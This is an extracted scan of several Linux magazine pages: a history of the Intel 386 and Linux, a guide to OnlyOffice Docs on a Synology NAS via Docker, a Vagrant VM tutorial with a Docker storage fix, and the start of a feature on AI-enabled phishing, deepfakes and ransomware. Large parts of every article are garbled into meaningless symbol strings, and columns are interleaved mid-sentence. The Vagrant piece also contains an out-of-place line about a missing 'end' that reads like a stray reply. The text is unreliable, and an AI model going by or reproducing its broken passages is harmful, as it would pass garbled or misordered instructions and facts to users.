GO HANDS ON WITH THE INTEL 386
instructions
Want to know what it was like to you can see in the panel below the enter \Quit to return to the
that can operate
on 128-, 256- or use an 80386 PC, and what Linus emulated screen. To load a disk, MS-DOS prompt.
even 512-bit Torvalds aimed to free the world select one from the menu that With the C: prompt displayed,
chunks of data. from? Well, head to www.pcjs. initially shows None and click on enter WIN386 to be transported
org/software/pcx86/sys/ Load. Now, at the prompt in the to Windows, in its full-colour glory.
windows/2.0x/ and you’ll see emulated screen, enter A: to OK, “full-colour” is a bit of an
+"*2)1"!,*-."0(-/, select that disk and then enter exaggeration but this is ancient
starting up. It boots to MS-DOS DIR to see the files on that disk. hardware. We’re sure you’ll find
0&+!,40%01,""5" 21"! One program we know that works your way around this early GUI, so
specifically. We’ll come to that is SuperCalc 1.10, which is on a we’ll resist suggesting what you
later, but to start, we thought you disk of that name, so when you’ve should run. When done with any
might like to get some experience loaded it, execute it by entering application, click on the ‘-’ icon at
of MS-DOS. There aren’t any DOS SC . You’ll need to consult the the left of the window’s title bar
programs on the hard disk (C:), but documentation for this early and then select Close. And to exit
there are several on floppy disks. spreadsheet, but that’s easy to Windows, do just the same on the
No floppy disk is loaded initially, as find online. When you’re done, MS-DOS Executive window.

72 LXF326 April 2025 www.linuxformat.com

 Linux hardware TUTORIALS

instruction to several instructions per clock cycle per It’s a shame we

core, but let’s go straight to the bottom line. The can’t learn much
Dhrystone rating of a 40MHz 80386 is around 5 MIPS; about a chip
from its exterior,
a modern mainstream processor, the Intel Core because the Intel
i5-13400F, clocks up 88,309 MIPS. We recognise 80386 was hugely
1%1Dhrystone is an old benchmark, even so, we think influential, if for no
an 18,000 times performance difference is an eye- other reason than
allowing Linux
opener. And we haven’t even looked at today’s top-end
to see the light
chips, some of which boast a Dhrystone MIPS figure in of day.
the millions.

80386 computers
So we come to the subject of the hardware that was
powered by the 386. In particular, we’re looking at what
we could think of as ordinary PCs, as opposed to
workstations. After all, this is the sort of hardware that
Linux was designed for in the early days. We could do
worse than take a look at the 386-based PC that Linus
Torvalds bought for his Linux project. The processor
was the DX variant clocked at 33MHz, it had 4MB of -/, "00,/0+!@8;@?#),1&+$v-,&+1 ,-/, "00,/0n
RAM, and a 40MB hard disk, which he considered they were expandable to 16MB of RAM, and they had a
+,13"/6)/$"o%"/"40+,;@?#),1&+$v-,&+1 91MB or 327MB disk. There was an Ethernet port and The Linux
coprocessor, but he added one 18 months later. various video options with a maximum resolution of kernel included
For a 21-year-old student, this was quite an 1,152x900 in 256 colours. The workstations were support for
investment. Indeed, Torvalds is on record explaining housed in floor-standing tower cases and supplied the 386 until
%,4%"40)"1,##,/!&1o "$,1012!"+1),+n21 4&1%1%"2+,-"/1&+$0601"*n1%&0"&+$2+v 2012, that was
he lived at home with his mother, so he didn’t need to developed Unix OS based on BSD (Berkeley Software 21 years since
spend much of the loan on living costs. Also, since he Distribution Unix) with the addition of the SunView that first 386-
only release.
bought it just after Christmas, he had additional money graphical user interface. The 25MHz version with the
Its successor,
that he’d been given as presents. We don’t know how smaller 91MB disk and a 16-inch monitor cost a
the 486 – as
much the PC cost, but we’ve done a bit of detective whopping $17,990 at launch, and significantly more mentioned
work. Adverts in the January 1991 edition of Computer &+/")1"/*04&1%;?6"/0,#&+#)1&,+1("+&+1, by Linus
Shopper magazine suggest that, in the UK, a computer account. Torvalds’s £5,200 PC seems positively Torvalds in his
of roughly the same specification as the one bought by %"-6 ,*-/&0,+o famous 1991
Torvalds would have cost upwards of £2,300 including announcement
VAT, and from a later edition, we glean that he’d have The end of the beginning of Linux – did
paid about £105 for the coprocessor he added later. Although Linux was announced in August 1991, there even better.
Multiplying these figures by the inflation rate over the was no way that initial offering could be considered From its
inclusion in
intervening periods, we arrive at today’s equivalents of 20)"0601"*n"3"+4%"+4"/"*"*"/1%1&140
1989, the 486
£5,200 and £220 respectively. So, while the operating only the kernel. In fact, according to Linus Torvalds,
survived in the
system might have been free, we can’t help but &1 ,*-/&0"!)&11)"*,/"1%+*2)1&10(&+$ ,!"n&+ Linux kernel for
comment on the fact that the Linux route wasn’t cheap addition to drivers for the keyboard, the display in 33 years until it
in the early days. Indeed, users would have paid quite a 1"51*,!",+)6n0"/&))&+"+!1%"!&0(n-)201%" was eventually
lot more to embrace the new operating system rather filesystem. In fact, Linux was only released at version phased out in
than stick with the MS-DOS or Windows alternative. 1.0 in the spring of 1994. version 6.1.
# ,2/0"n"3"+*,/"*,!"01:@>v0"!0n4%& % Prior to its full release, in 1992, Andrew S
would be suitable for most Windows users, would have Tanenbaum of Minix fame posted a Usenet article
CREDIT: Wikimedia Commons/Konstantin Lanzet, Intel i386DX.

been expensive from today’s perspective, but they’d entitled ‘Linux is obsolete’. This led to a well-known
have been around half the price. debate between Tanenbaum and Torvalds. Here,
If you want to get a better idea of 1991 computer though, we want to pick up on just one of Tanenbaum’s
technology in the form of 386-based PCs in particular, criticisms, namely that “writing a new operating system
see our Hands On With The 386 box (opposite). that is closely tied to any particular piece of hardware,
We can’t leave the subject of 80386 computers especially a weird one like the Intel line, is basically
without taking a brief look at 386-based engineering wrong”. Needless to say, the assertion that Linux’s
workstations in a little more detail. Indeed, these were portability was compromised by being too reliant on
probably the only 386 computers to be running the x86 ISA couldn’t have been more wrong. After all,
anything other than MS-DOS or Windows back &#1%1%!12/+"!,211,"1%" 0"n1%&00"/&"0,#
&+9AA9o+! %"-1%"6*,01 "/1&+)64"/"+}1o + articles on the hardware that made Linux great would
9AA@n2+& /,0601"*0)2+ %"!&102+;@>& be a somewhat repetitive and boring one. So, do
0"/&"0,#14,*,!")0n,+" ), ("!19= 7+! forgive us for issuing this spoiler, but that hardware
4&1%<,#*"*,/6n+!1%",1%"/ ), ("!1 we’re going to look at in the remainder of this series
:= 7+!4&1%@,#*"*,/6o,1%%!@8;@> certainly doesn’t comprise just x86 chips.

IMPROVE YOUR LINUX SKILLS Subscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux April 2025 LXF326 73

TUTORIALS OnlyOffice

ONLYOFFICE
Credit: www.onlyoffice.com

Run OnlyOffice from

your Synology NAS
Enhance your private Synology cloud with OnlyOffice Docs,
as Kseniya Fedoruk walks you through the installation process.

+1,!6}0!&$&1))+!0 -"n"##& &"+1!, 2*"+1

I *+$"*"+1+! ,)),/1&,+/" /2 &)#,/

,1%-"/0,+)+!-/,#"00&,+)4,/(#),40o
6+,),$6ƒ+"14,/(v11 %"!01,/$"„!"3& "0
%3"),+$""+-,-2)/#,/1%"&//,201#&)"01,/$"+!
OUR 0%/&+$ -&)&1&"0q&#6,2}/"/2++&+$+,##v1%"v0%")#
1%,*",/&+6,2/,##& "n1%"/"}0%&$% %+ "&1
EXPERT ,2)!"6+,),$6*,!")o
Kseniya Fedoruk 6&+1"$/1&+$OnlyOffice Docs4&1%6,2/6+,),$6
has been a 0"12-n6,2 +")"31"6,2/#/,*0&*-)"01,/$"
Kubuntu and 0,)21&,+1, ,*-/"%"+0&3"!, 2*"+1"!&1&+$+! Adding the Community package source.
open source ,)),/1&,+-)1#,/*oDocker&01%"0&*-)"01*"1%,!
enthusiast #,/*,01-",-)"1,&+01))OnlyOffice Docs,+1%"&/ com&+1%", 1&,+#&")!n1%"+ )& (o +1%"Package
ljȶɭࢳˊơŔɭɽ࡬ŔȥƎ 6+,),$6n+!1%&0/1& )"0 ,3"/0))1%"01"-0 Center, 0")" 1ƒsee the screengrab top-right„1%"
ǫɽࢳŔƃȶȥʋɭǫŹʠʋȶɭ 1%1/"/".2&/"!o ,**2+&161n1%"+#&+!+!&+01))SynoCli File Tools.
on GitHub and
an OnlyOffice Set up your Synology NAS device Container Manager
document +02/"6,2/6+,),$6!"3& "&0 ,++" 1"!1, 2+ %Container Manager +!%"!1,1%""$&01/6
expert. 6,2/), )+"14,/(+!-,4"/"!,+o "001%" 11,#&+!1%"+)6##& "š, 2*"+10"/3"/&*$"o
Package Center ,+6,2/6+,),$6!"0(1,-o + ,4+),!1%"3"/0&,+1%102&106,2/+""!0+!
1%")) ($"0 1"$,/6n#&+!Container Manager -/, ""!1, /"1"+"4 ,+1&+"/o2/&+$0"12-n6,2}))
+!&+01))&16 )& (&+$1%" ,//"0-,+!&+$211,+o ,+#&$2/"1%" ,+1&+"/6+*&+$&1n*--&+$-,/10
 ,/"+%+ "!#2+ 1&,+)&16n&1}04,/1%!!&+$ ƒ02 %0-,/1<<;;#,/ +!@8@8#,/ „n
1%"6+,,**2+&16- ($"0,2/ "ƒsee the +!*,2+1&+$!&/" 1,/&"01,01,/"),$0+!!1o
screengrab above„o3&$1"1, ($""+1"/– !'201+6+" "00/6"+3&/,+*"+13/&)"011%&0
"11&+$0– ($",2/ "0o+!"/1%" ($" 01$"n(""-&+$&+*&+!1%1#,/1%",**2+&16!&1&,+n
,2/ "01n )& (!!o-" &#66+,,**2+&16&+ 6,2*64+11,/"*,3"1%"/,!2 1!&1&,+3/&)"o
1%"*"#&")!+!https://packages.synocommunity. --)66,2/0"11&+$0+!)2+ %1%" ,+1&+"/o
, ,+#&/*&+01))1&,+4002 "00#2)n,-"+4"
/,40"/+!"+1"/6,2/6+,),$6}0 !!/"00+!1%"
WHY ONLYOFFICE ON SYNOLOGY? -,/16,2 ,+#&$2/"!o #1%"OnlyOffice Docs4") ,*"
-$"$/""106,2n ,+$/12)1&,+0x6,2+,4%3"
OnlyOffice Docs&03"/01&)",-"+0,2/ ",##& "02&1"1%1,##"/0 0" 2/"n0")#v%,01"!0,)21&,+#,/!, 2*"+1"!&1&+$
,+)&+""!&1,/0#,/3/&"16,#!, 2*"+1#,/*10n&+ )2!&+$1"51 +! ,)),/1&,+/2++&+$0"*)"00)6,+6,2/o
!, 2*"+10n0-/"!0%""10n-/"0"+11&,+0+! 0o +1"$/1&+$
OnlyOffice Docs4&1%6,2/6+,),$6 /"1"0-,4"/#2) Installing via SSH
,*&+1&,+o6(""-&+$6,2/!, 2*"+10,+6,2/,4+0"/3"/n6,2 ,/1%,0"4%,-/"#"/4,/(&+$4&1%1"/*&+) ,**+!0n
/"1&+#2)) ,+1/,),3"/6,2/!14%&)""+',6&+$1%" ,+3"+&"+ ",# OnlyOffice Docs +"&+01))"!,+6,2/6+,),$6
 "00&+$+!"!&1&+$#&)"0!&/" 1)6#/,*6,2/6+,),$601,/$"o 1%/,2$% o
%&00"12-"+02/"0!1-/&3 6+!0" 2/&16n")&*&+1&+$1%"+""! &/01n"+)"  "00,+6,2/6+3&$1&+$
1,/")6,+"51"/+) ),2!0"/3& "0oOnlyOffice Docs )0, # &)&11"0 1,,+1/,)+")–"/*&+)©o& (1%",51,
0"*)"00 ,)),/1&,+6"+)&+$0&*2)1+",20!, 2*"+1"!&1&+$ "+)"1%" 0"/3& "+!--)61%" %+$"0oƒsee
4&1%1"**"*"/0o%""!&1&+$"+3&/,+*"+1 +" 201,*&0"!n screengrab above the next column)
1,,n1,*""16,2/0-" &#& /".2&/"*"+10+!-/"#"/"+ "0o "51n ,++" 11,6,2/3&+  )&"+1n
02 %0OpenSSH. +&+25n,-"+1"/*&+)+!/2+

74 LXF326 April 2025 www.linuxformat.com

 OnlyOffice TUTORIALS

The Synology Package Center. Installing SynoCli File Tools.

Enabling SSH access. Running the OnlyOffice Docs test example.

ssh username@ip_address o "-11%" ,++" 1&,+6 -$"o%"/"n6,2 +2-),!#&)"0,/ /"1"+"4,+"01,

0")" 1&+$"04%"+-/,*-1"!o #2))6"5-),/"1%"0,)21&,+}0#"12/"0o
There are
+ " ,++" 1"!n&+01))1%"Docker3"/0&,+,# OnlyOffice Docs +"&+1"$/1"!4&1%3/&,20
detailed steps
OnlyOffice Docs: -,-2)/-)1#,/*01,#2/1%"/"+%+ "6,2/!, 2*"+1 on installing
$ sudo docker run -i -t -d -p 80:80 --restart=always -e " ,0601"*o"!6v*!" ,++" 1,/0/"3&))"#,/ OnlyOffice Docs
JWT_SECRET=my_jwt_secret OnlyOffice/ 0601"*002 %0"51 ),2!n4+),2!n)#/"0 ,n in its GitHub
documentserver %/",&+1n,,!)"n,+#)2"+ "n,/!/"00+!0,,+o repo: http://
#-,/1@8&0&+20"6+,1%"/--)& 1&,+n"02/"1, +1"$/1&+$OnlyOffice Docs 4&1%6,2/ /"1"0 github.com/
0-" &#6+)1"/+1"-,/1n02 %0@888n!2/&+$0"12-o -,4"/#2)n0")#v%,01"!!, 2*"+1*+$"*"+1 OnlyOffice/
#1"/1%"&+01))1&,+ ,*-)"1"0n "001%" 0,)21&,+o&1%1%&0$2&!"n6,21/+0#,/*6,2/6+,),$6 Docker-
OnlyOffice Docs &+1"/# "6"+1"/&+$http://<IP_ &+1, ,*-/"%"+0&3"-/,!2 1&3&16%2n ,*&+&+$ Document
Server
address>:<Port>/&+6,2//,40"/o,20%,2)!0""1%" 0" 2/"01,/$"4&1%!3+ "!"!&1&+$ -&)&1&"0o
") ,*"-$"n ,+#&/*&+$1%1OnlyOffice Docs&0
/"!61,20"o
SYNOLOGY DEVICE SUPPORT
Using OnlyOffice Docs on Synology
,"5-"/&"+ "1%"#2+ 1&,+)&16,#OnlyOffice Docs, 6+,),$6*("0301/+$",#!"3& "021+,1)),#1%"*%3"1%"
01/16"+)&+$1%"2&)1v&+1"01"5*-)"o%&0#"12/" 02--,/11,/2+OnlyOffice./,2$%/2)",#1%2*&01%1))21&10
)"106,22-),!), )#&)"0+!"5-),/"1%"-)1#,/*}0 )2"!"3& "0%3"1%"+" "00/602--,/1#,/1%"Container
-&)&1&"0o 1&31"&16/2++&+$1%"#,)),4&+$p Manager1%11%&0$2&!"/".2&/"0o,2 +$"1 ,*-)"1")&01,#
$ sudo docker exec $(sudo docker ps -q) sudo 02--,/1!"3& "0%"/"pwww.synology.com/en-us/dsm/packages/
supervisorctl start ds:example ContainerManagero+,1%"/("6461, %" (#,/02--,/1&0&#1%"
#6,2}!)&("1%""5*-)"1,01/121,*1& ))64&1% !"3& "0,##"/3&/12)* %&+"02--,/1n01%&0&+!& 1"0&1%01%"
1%" ,+1&+"/n2-!1"&10 ,+#&$2/1&,+20&+$p -/, "00,/+!*"*,/6/".2&/"*"+101,/2+1%"Docker ,+1&+"/0o
$ sudo docker exec $(sudo docker ps -q) sudo sed 3&+$0&!1%&0n),4"/v0-" !"3& "0*&$%101/2$$)"&#1%"6}/"
‘s,autostart=false,autostart=true,’ -i /etc/supervisor/ (&11"!,214&1%1%"*&+&*2**"*,/6n,#1"+: o #6,2}/"-)6&+$
conf.d/ds-example.conf /,2+!4&1%3&/12)* %&+"0+!Docker&+01))1&,+0n&1 ,2)!"
+ "1%"1"01"5*-)"&0/2++&+$n,-"+6,2/ 4,/1%),,(&+$1&+ /"0&+$+6&+01))"!*"*,/6o
/,40"/+!+3&$1"1,1%"OnlyOffice Docs"5*-)"

IMPROVE YOUR LINUX SKILLS Subscribe now at http://bit.ly/LinuxFormat

www.techradar.com/pro/linux April 2025 LXF326 75

ADMINISTERIA
Managing your Vagrant
virtual machines
Laziness is the mother of invention and Stuart Burns is a past master at
getting his machines to do all his work for him…
e have been experimenting with some new That’s how easy it is to set up a simple Vagrant-

W applications, with the intent of disposing of

them afterwards. Remember, it’s all about
based VM. It is just like any other virtual machine. To
stop it and delete it, use vagrant destroy default . To
disposable but reproducible builds. We wanted just stop it use vagrant halt .
something lightweight and completely controlled Now, let’s move beyond single-machine setups and
from the command line. Enter Vagrant. create a simple three-node cluster. In this example,
The beauty of Vagrant is that there are no huge we’ll create three VMs, each with its own setup and
image files to manage. It requires nothing beyond a network configuration. They all still exist within that
setup file containing the details needed to set up the one Vagrantfile configuration.
disposable VMs, and VirtualBox to provide the Here’s a Vagrantfile to create a simple three-node
underlying virtualisation platform. You could even give cluster with an Apache web server installed on each
someone a copy of the Vagrant file and they could just node. Your Vagrantfile has a small syntax issue – you’re
run it and have the same setup. missing an end to properly close the block for the
To install Vagrant on Ubuntu – other distros and config.vm.define and the Vagrant.configure block.
OSes are covered at https://developer.hashicorp.com/ Vagrant.configure(“2”) do |config|
vagrant/install – use the following three commands: # Define three nodes (VMs)
$ wget -O - https://apt.releases.hashicorp.com/gpg | (1..3).each do |i|
sudo gpg --dearmor -o /usr/share/keyrings/hashicorp- config.vm.define “node#{i}” do |node|
archive-keyring.gpg node.vm.box = “debian/bookworm64”
$echo “deb [arch=$(dpkg --print-architecture) signed- node.vm.network “private_network”, type: “dhcp”
by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] # Customize VM memory and CPU
https://apt.releases.hashicorp.com $(lsb_release -cs) node.vm.provider “virtualbox” do |vb|
main” | sudo tee /etc/apt/sources.list.d/hashicorp.list vb.memory = “1024”
$sudo apt update && sudo apt install vagrant vb.cpus = 1
After the app is installed (use vagrant -v to report end
the version number), we need to make the Vagrantfile end # End of config.vm.define block
that contains the definitions to make it how we want it. end # End of the loop (1..3)
Each Vagrantfile needs to exist in a folder and be end # End of Vagrant.configure block
initialised for Vagrant use. Create a folder called The (1..3).each loop creates three VMs (node1,
vagrantone in your home directory. Use the command node2 and node3), each with a private network. The IP
line to navigate into it and use vagrant init to configure addresses of these nodes is automatically assigned
the folder. Among other things, it creates a base within the private network.
The process
of starting up
Vagrantfile. Edit the following line in the Vagrantfile: The vb.memory and vb.cpus settings ensure each
the cluster and config.vm.box = “base” VM gets 1GB of RAM and one CPU. You can adjust
ìijĬǏČķijĥķijƧ Change it to config.vm.box = “debian/bookworm64” . these values depending on your system’s resources.
All that remains is to After creating the Vagrantfile, you can start the
create the Vagrantfile three-node cluster with the following command:
+!01/1&1o1/1&14&1% $ vagrant up
vagrant up and SSH This command downloads the base box (debian/
&+1,&14&1% vagrant ssh bookworm64), sets up the VMs, and provisions them
default , default being with Apache. Once the process completes, you can
1%"+*"$&3"+1,0 verify that all three nodes are running by visiting their
with no name specified. respective IP addresses in your browser.
Other OS choices are To access each VM, you can use SSH. For example,
3&))"1https://portal. to SSH into node1, run vagrant ssh node1 . To get the
cloud.hashicorp.com/ status of any machines, running or otherwise, there is
vagrant/discover. the vagrant status command.

76 LXF326 April 2025 www.linuxformat.com

 ADMINISTERIA

This gives you access to that node’s terminal, where

you can run commands or modify the configuration. Stuart Burns
While Vagrant provisioning can handle simple is a sysadmin for
setups, sometimes you need more control or want to Ŕࢳbȶɭʋʠȥơࠄ߿߿
run additional configurations after the VM is built. This ơȥʋơɭɢɭǫɽơŹŔɽơƎ
is where a post-build Bash script comes into play. ǫȥʋǠŔʋ•ȶȥƎȶȥࡳ
You can create a separate Bash script that runs
after the VMs are provisioned to handle additional
configurations, such as installing software, setting up
services, or configuring the system environment. ENEMY WITHIN!
Here’s an example of a simple post-build Bash script
(post_build.sh) that you can use to configure the VMs: Any sysadmin knows that
]ķĨǎĬìąĥÿÐǎÆÿķĬijÐĨǎĬÐijķĥǎš­äĨ­Ćijǎ
#!/bin/bash ãìÿÐǎìĆǎ­ÿÿǎìijĬǎäÿČĨőƧ sinking Monday morning feeling
# Example post-build script for Vagrant when you get to work and
echo “Starting post-build setup...” several hosts are misbehaving. It
# Update system and install necessary packages happened to me last week with
sudo apt-get update several Docker hosts. Systemctl
sudo apt-get install -y nudoku told me Docker was dead. But
echo “Post-build setup completed.” there were no obvious issues.
Once the Bash script is ready, you can modify the The only thing that had
Vagrantfile to run the script after the VM provisioning: happened was Docker got a
Vagrant.configure(“2”) do |config| minor upgrade from v25 to 26.
(1..3).each do |i| Eventually, the issue turned
config.vm.define “node#{i}” do |node| out to be that Docker 26 had
node.vm.box = “debian/bookworm64” removed the driver for LVM thin-
node.vm.network “private_network”, type: “dhcp” provisioned containers. Had I
node.vm.provider “virtualbox” do |vb| read the documentation, I would
vb.memory = “1024” have hopefully picked that up.
vb.cpus = 1 (To be fair, it wasn’t me who had
end performed the upgrade, so it
# Add post-build script didn’t immediately occur to me.)
node.vm.provision “shell”, path: “post_build.sh” The remediation was
end straightforward, but involved
end removing the LVM partition
end upon which the Docker
Now, when you run vagrant up , the post-build script containers were stored,
executes after the initial provisioning, completing your recreating the partition, and
setup with additional software and configurations. formatting with XFS (or
Vagrant simplifies the process of managing multiple whatever filesystem you are
VMs for testing, development or complex clustered familiar with), setting the mount
environments. By using Vagrantfiles, you can easily point to /var/lib/docker.
create and manage your VMs, and with shell scripts, Don’t forget to set it up in
you can automate complex post-build tasks. /etc/fstab and double-check it
works with mount -a . The last
thing is to change /etc/docker/
NVME AND RASPBERRY PI: A YUMMY SANDWICH daemon.json. Change the line
about the storage driver:
Raspberry Pis are great but, let’s be point to mention is the ability to have a { “storage-driver”: “overlay2” }
honest, the storage side leaves a lot to good amount of fast storage. USB mass The line describing the thin
"!"0&/"!&+1"/*0,#0&7"n0-""!+! storage sucks. If you haven’t got an NVMe provisioned locate can be
write endurance. Often, it strangles the Pi HAT yet, we thoroughly recommend it. removed. Doing this wipes out
performance of the Pi because it’s waiting any pre-existing containers. I
on an I/O operation to complete. suggest that if those containers
To fix this issue, we purchased an NVMe are required, you may have to
HAT for it. We had a spare 256GB NVMe revert the Docker version. If this
drive hanging round to pair with it. Setting is the case, you may be doing
up the Pi NVMe HAT is a bit fiddly with the Docker wrong – the whole point
ribbon cables, but it’s only a 10-minute job. of containers is that they are
Same goes for the task of setting it up as supposed to be ephemeral.
the boot device. At this point, reboot, and if
While not having conducted any specific Docker is set to automatically
tests on it, we can confirm it is much start, everything should be back
faster in general operations, and updating
ǎÆéЭĥǎ­ĆÌǎÐããÐÆijìŊÐǎvìǎ<
ƒƧǎ?ijǎą­üÐĬǎijéÐǎ to normal. It was an eventful
the OS is much quicker. By far the best ŋČĨÿÌǎČãǎÌìããÐĨÐĆÆÐƧ Monday morning, for sure.

www.techradar.com/pro/linux April 2025 LXF326 77

IN DEPTH AI security threats

The rise of AI presents

cybersecurity challenges
for all. Davey Winder explores
the dangers – and how to
defend against them!

78 LXF326 April 2025 www.linuxformat.com

 AI security threats IN DEPTH

T
%"0&+$2)/&16&0 2//"+1)6x0#/04" We asked ChatGPT
(+,4x#& 1&,+)"3"+14%"+1" %+,),$6 a simple question
and it was wrong,
advancement spirals out of control with
but when we
unforeseen consequences for human asked if it was
&3&)&01&,+o ,**,+-/1,#1%&0&0+/1&#& &)02-"/ sure, it corrected
&+1"))&$"+ "n)"1,1("0")#v!"1"/*&+&+$!" &0&,+01 itself – and was
a level far above standard human levels, which at this still wrong. Never
trust an AI!
point doesn’t seem much beyond whether we need
*,/"/4*&)(+"512"0!6n211%"-,&+101&))01+!0o
0&1&0n &0%"/"n1%,2$%601+!/!*"1/& 0n&1
2//"+1)6 ,010[98n888&+ ,*-21"1&*"1,*1 %
01+!/!%2*+01/"$2)/10(0o%&0!,"0+}1*"+
1%1$"+"/1&3" 4&1%&10&)&161,*&*& %2*+
voices and animated facial expressions isn’t already
,21#,5&+$01+!/!%2*+0o
+1%&0 "3"/6!6/")&16n4%14"/"0""&+$&0
+"443",#&+0&!&,20+!4&!"0-/"! v-,4"/"! into sharing something they shouldn’t, or
1%/"10o3"/6,+"+""!01,"4/",#%,41%"+"4 masquerading as bank officials to get them to
technologies make online exploits more dangerous ,+#&/*#/2!2)"+11/+0 1&,+o2102 %11 (0
1%+"3"/n+!"3"+,-"+2-+"43" 1,/0,#11 (o have historically required a significant investment of
*+-,4"/o  %+$"01%1-& 12/"!/*1& ))6o
Phishing and phakes   +1/$"1&+!&3&!2)010 )"n&+ /"0&+$1%"
+",#1%"*,01-,4"/#2)--)& 1&,+0,# &0&+1%" likelihood of success,” says Muhammad Yahya Patel,
/"+,#-%&0%&+$o &1%"/1,n1%11"/*%0*,01)6 lead security engineer and evangelist in the office of
referred to dodgy emails that appear to come from a 1%"1%" (,&+1,#14/"o11 ("/0 +
)"$&1&*1"0,2/ "x21,+ "6,2!!1%"&)&161, create processes to exploit specific vulnerabilities and
//6,+4%,))6 ,+3&+ &+$%2*+v)&(" ,+3"/01&,+0n personalise attacks far more efficiently than humans
6,2}/"&+1,4%,)"+"44,/)!,#/&0(o +1%"-01n "3"/ ,2)!o€ +,1%"/4,/!0n  +"+)"11 ("/01,
phishing attempts largely relied on catching the carry out sophisticated phishing attacks on hundreds
recipient with their guard down, and getting them ,/1%,20+!0,#1/$"101,+ "o
1,&**"!&1")6$&3"2-0,*"&1"*,#3)2)" Even if phishing targets are cautious, avoiding
&+#,/*1&,+o,4n))&11("0&0+ ("6#,/ scams is made a whole lot harder by the rise of
*&+01/"*x4%& % +"0&)6"01,)"+x+! +,1%"/ v-,4"/"!1" %+,),$6x+*")6!""-#("0o
/&*&+)0 +20"+ 1, ,+3&+ &+$)6 //6,++ !*&)1,+n0"+&,/ 6"/0" 2/&16 ,+02)1+11
interactive conversation for as long as it takes to get CyberSmart, is in no doubt that deepfake attacks
4%11%"64+1#/,*1%"1/$"1o /"1%"-/&*/6"3,)3&+$1%/"11,"*"/$"#/,*1%"
+,+"0"+0"n1%&0!,"0+}1+" "00/&)6 %+$" 02 "00,# 1" %+,),$6o11%"01/1,#:8:<n€&)1,+
1%"$*"))1%1*2 %o,2}3"-/,)6%"/!,# says, “we saw cybercriminals use a deepfake of a chief ChatGPT won’t
generate images of
0,-%&01& 1"!0-"/v-%&0%&+$11 (0n4%"/" /&*&+)0 financial officer to trick an employee into transferring famous people but
have directly impersonated senior staff to trick victims :=*&))&,+!,))/01,1%"*o€ has no problem
This particular attack began with a relatively with looky-likies.
straightforward phishing email, which the employee
PRIVACY PROBLEMS 40/&$%1)60 "-1& ),#o214%"+1%""*-),6""
',&+"!3&/12)*""1&+$+!04+!%"/!1%" 
!*&)1,+20"!1,"&+)4"+#,/ "*"+1n x04"))0,1%"/-",-)"%"/" ,$+&0"!x))020-& &,+0
working as a detective in charge of a cybercrime 4"/"$,+"o€
team, before joining the private sector and That’s the problem: while the security message
" ,*&+$ 6"/0" 2/&16 ,+02)1+1o+!&+ about not trusting emails and messages has been
%&03&"4n1%"$/"1"011%/"1#/,* &0+}1 driven home over the last few years, the standard
conventional cyberattacks, but rather the advice is to take concerns to the person involved
&+30&,+,#,2/-/&3 6o 2-1%"20&+"00%&"// %6o%1&#6,2 +}1"02/"1%"
That’s because the amount of data collected person you’re talking to is real and not a deepfake?
by technology interactions these days is beyond  &0" ,*&+$&+ /"0&+$)60,-%&01& 1"!n€060
301o 201-& 12/"4%1 ,,$)",/  ",,((+,4 Pilton, “the responses are increasingly accurate, and
about you, your activities, interests, associations the number of tools and resources we have access to
+!0,#,/1%o%1&#+,/$+&01&,+%,)!&+$ has dramatically increased, from simple text responses
02 %!140/" %"!l *$&+" ,))1&+$)) 1,-& 12/"0n2!&,n3&!",+!*,/"o€""-#("0+,4
1%1&+#,/*1&,++!0(&+$+ 1,-/,#&)" have more realistic facial expressions, lip movements,
-"/0,+n€&)1,+4/+0o%1&# 6"/ /&*&+)0 and voice synthesis, making them almost impossible to
CREDIT: Magictorch

20"!1%&0&+#,/*1&,+#,/ v-,4"/"!0, &) !&01&+$2&0%#/,*/")&161#&/01n,/"3"+0" ,+!n$)+ "o

"+$&+""/&+$l 1+,),+$"/0""*0#/v#"1 %"!1, %"/"}0+,"06!"#"+ "$&+011%&0o0/+!/"4
picture a cybercriminal receiving a notification ,)01"/n0"+&,//"0"/ %+!!"3"),-*"+1*+$"/
that a victim has been effectively socially ƒ!10 &"+ "„11%"6+,-060,#14/" +1"$/&16
"+$&+""/"!n+!&0/"!61,""51,/1"!o€ /,2-n-,&+10,21n&!"+1&#6&+$ v-,4"/"!,10
“requires resourcing and secondary identity checks

www.techradar.com/pro/linux April 2025 LXF326 79

IN DEPTH AI security threats

breaches at one end of the

11 (0-" 1/2*,/)/$"v0 )"
0"/3& "!&0/2-1&,+11%",1%"/o
 v!/&3"+,10 +-"/#,/*"5%201&3"1"01&+$,# 
endpoints to identify weaknesses such as inadequate
rate limiting or insecure authentication mechanisms,”
" ()+!1,)!20o
+!+,*11"/%,401/& 1)66,2/20&+"00&0), ("!
down against such attacks, you could still be the target
,#02--)6v %&+11 (o%&0&04%"/"% ("/0
compromise a weak link further down the supply chain,
such as an external supplier, to get their malware into
1%"!"0&/"!1/$"1o2 %11 (0/"-,1"+1&)
+&$%1*/"#,/ *+$"/0n" 20""3"+4&1%1%"
most careful security processes, it’s normally
&*-,00&)"1,#2))62!&11%" ,!"/2++&+$,+1%&/!v
-/16!"3& "0 ,*&+$&+1,1%"20&+"00o
$&+n4/+01")n1%&0&0+/"4%"/"1%/"1
actors can leverage automated tools to find
32)+"/&)&1&"0o  +2+!"/01+!4%1&0&+6,2/
environment, who your partners are, and what
,1%"/--)& 1&,+0&+1"/ 14&1%6,2/02--)6 %&+n
It’s possible to that can increase customer support and social media giving attackers an edge in targeting their efforts
bring people 0"/3& &+$ ,010€o #,/$/"1"/02 "00o€
back from
the dead! It’ll
,/&01%&0/&0()&*&1"!1,1%"*,01!"!& 1"!+!
just be a while 4"))v/"0,2/ "!11 ("/0o""-#("v0vv0"/3& "&0 Ransomware
before real-time " ,*&+$3&))",+1%"!/(4"+!&+ /&*&+) +/",#/&0(1%16,2*&$%1+,1&**"!&1")6
rendering is #,/2*0o//1&+ /"*"/n0" 2/&164/"+"00 00, &1"4&1% &0/+0,*4/"x#1"/))n6,2
possible.
!3, 1"1+,4"<n-/"!& 101%14" +0,,+ !,+}1+""! 1,"+ /6-1!&0(v#2)),##&)"0n/&$%1l21
expect “deepfake video, audio and text capabilities to *)& &,20"+ /6-1&,+&0,+)61%"#&+)01"-,#*2)1&v
